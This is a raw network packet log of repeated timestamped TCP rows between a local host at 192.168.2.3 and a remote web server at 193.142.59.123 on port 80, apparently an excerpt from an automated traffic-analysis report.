Aug 23, 2021 02:08:39.392821074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392842054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392855883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.392894030 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.392931938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.423687935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423717976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423736095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423753023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423759937 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.423769951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423787117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423803091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423810959 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.423820019 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423836946 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423856974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423857927 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.423876047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423885107 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.423892021 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423909903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423927069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423940897 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.423942089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423960924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423976898 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.423979998 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.423996925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424005032 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.424015999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424030066 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.424031973 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424048901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424062967 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.424066067 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424082994 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424098969 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424099922 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.424115896 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424134016 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.424135923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424154997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424159050 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.424170971 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424186945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424204111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.424215078 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.424253941 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455163956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455195904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455213070 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455229044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455245972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455246925 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455262899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455279112 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455286026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455305099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455321074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455337048 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455338001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455354929 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455364943 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455370903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455389023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455404997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455415964 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455425024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455442905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455456972 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455460072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455478907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455485106 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455496073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455513000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455513000 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455529928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455548048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455554008 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455568075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455585003 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455593109 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455600977 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455617905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455625057 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455635071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455652952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455662966 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455668926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455686092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455703020 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455705881 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455724955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455727100 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455744982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455751896 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455763102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455780029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455796957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455806017 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455815077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455831051 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455849886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455863953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455872059 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455882072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455899000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455905914 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455918074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455929995 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455938101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455955982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455959082 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.455974102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.455991983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456007957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456021070 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.456023932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456043005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456053019 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.456058979 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456078053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456084967 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.456096888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456108093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.456113100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456130981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456146955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456154108 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.456165075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456182957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.456192970 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.456223965 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488486052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488513947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488528967 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488545895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488563061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488578081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488590002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488609076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488605976 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488626003 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488643885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488658905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488666058 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488677025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488692999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488713026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488725901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488729000 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488744020 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488760948 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488768101 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488780022 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488795042 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488800049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488818884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488835096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488852024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488852978 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488867998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488886118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488895893 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488903046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488919973 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488925934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488940954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488949060 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488960028 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488976002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.488987923 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.488991022 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489010096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489026070 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489036083 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489042997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489059925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489059925 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489078999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489083052 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489098072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489115953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489123106 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489132881 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489151001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489166975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489166975 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489182949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489193916 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489200115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489222050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489228964 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489240885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489254951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489259005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489275932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489293098 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489310980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489311934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489326954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489345074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489356041 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489365101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489382982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489383936 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489399910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489411116 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489418030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489435911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489449024 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489450932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489469051 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489485025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489492893 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489504099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489521980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489536047 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489548922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489557981 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489566088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489583015 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489599943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489603996 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489619017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489635944 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489650965 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489655972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489675999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489691973 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489701033 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489710093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489731073 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489752054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489768982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489784956 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489785910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489804029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489820004 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489835978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489850998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489860058 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489872932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489891052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489906073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489914894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489923000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489939928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489944935 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489955902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489973068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.489979982 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.489989042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490010023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490011930 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490027905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490041018 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490044117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490062952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490078926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490078926 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490096092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490113020 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490113020 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490130901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490143061 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490149975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490169048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490175009 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490185976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490202904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490204096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490220070 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490236044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490252972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490262985 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490268946 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490291119 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490308046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490318060 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490324974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490341902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490356922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490371943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490375996 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490390062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490406036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490425110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490426064 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490442991 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490458965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490462065 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490475893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490493059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490500927 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.490509033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490525007 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490540981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.490560055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.491177082 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.491193056 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.491195917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521460056 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521505117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521533012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521534920 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521562099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521584034 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521598101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521627903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521650076 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521655083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521682978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521697998 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521712065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521738052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521753073 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521766901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521792889 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521812916 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521826029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521857977 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521872044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521886110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521913052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521931887 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521940947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521966934 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.521989107 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.521995068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522022009 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522038937 CEST	49735	80	192.168.2.3	193.142.59.123
